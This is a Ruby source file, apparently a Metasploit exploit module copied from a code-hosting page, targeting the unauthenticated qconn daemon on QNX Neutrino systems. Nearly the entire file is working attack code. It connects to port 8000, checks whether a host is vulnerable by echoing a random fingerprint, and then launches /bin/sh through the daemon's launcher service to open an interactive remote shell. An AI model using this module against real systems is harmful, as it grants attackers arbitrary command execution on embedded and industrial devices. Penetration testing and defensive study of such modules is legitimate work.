Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/qnx/qconn/qconn_exec.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp9prepend Msf::Exploit::Remote::AutoCheck1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'QNX qconn Command Execution',16'Description' => %q{17This module uses the qconn daemon on QNX systems to gain a shell.1819The QNX qconn daemon does not require authentication and allows20remote users to execute arbitrary operating system commands.2122This module has been tested successfully on QNX Neutrino 6.5.0 (x86)23and 6.5.0 SP1 (x86).24},25'License' => MSF_LICENSE,26'Author' => [27'David Odell', # Discovery28'Mor!p3r', # PoC29'bcoles' # Metasploit30],31'References' => [32['EDB', '21520'],33['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],34['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],35['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']36],37'Payload' => {38'BadChars' => '',39'DisableNops' => true,40'Compat' => {41'PayloadType' => 'cmd_interact',42'ConnectionType' => 'find'43}44},45'DefaultOptions' => {46'WfsDelay' => 10,47'PAYLOAD' => 'cmd/unix/interact'48},49'Platform' => 'unix', # QNX Neutrino50'Arch' => ARCH_CMD,51'Targets' => [['Automatic', {}]],52'Privileged' => false,53'DisclosureDate' => '2012-09-04',54'DefaultTarget' => 0,55'Notes' => {56'Stability' => [CRASH_SAFE],57'Reliability' => [REPEATABLE_SESSION],58'SideEffects' => []59}60)61)62register_options(63[64Opt::RPORT(8000),65OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])66]67)68end6970def check71vprint_status('Sending check...')7273connect74res = sock.get_once(-1, 10)7576return CheckCode::Unknown('Connection failed') unless res7778return CheckCode::Safe unless res.include?('QCONN')7980sock.put("service launcher\n")81res = sock.get_once(-1, 10)8283return CheckCode::Safe unless res.to_s.include?('OK')8485fingerprint = Rex::Text.rand_text_alphanumeric(5..10)86sock.put("start/flags run /bin/echo /bin/echo #{fingerprint}\n")8788return CheckCode::Safe unless res.to_s.include?('OK')8990Rex.sleep(1)9192res = sock.get_once(-1, 10)9394return CheckCode::Safe unless res.to_s.include?(fingerprint)9596disconnect9798CheckCode::Vulnerable99end100101def exploit102connect103res = sock.get_once(-1, 10)104105fail_with(Failure::Unreachable, 'Connection failed') unless res106107fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.include?('QCONN')108109sock.put("service launcher\n")110res = sock.get_once(-1, 10)111112fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.to_s.include?('OK')113114print_status('Sending payload...')115sock.put("start/flags run #{datastore['SHELL']} -\n")116117Rex.sleep(1)118119fail_with(Failure::UnexpectedReply, 'Shell negotiation failed. Unexpected reply.') unless negotiate_shell(sock)120121print_good('Payload sent successfully')122123handler124end125126def negotiate_shell(sock)127Timeout.timeout(15) do128loop do129data = sock.get_once(-1, 10)130131return if data.blank?132133if data.include?('#') || data.include?('No controlling tty')134return true135end136137Rex.sleep(0.5)138end139end140rescue ::Timeout::Error141return nil142end143end144145146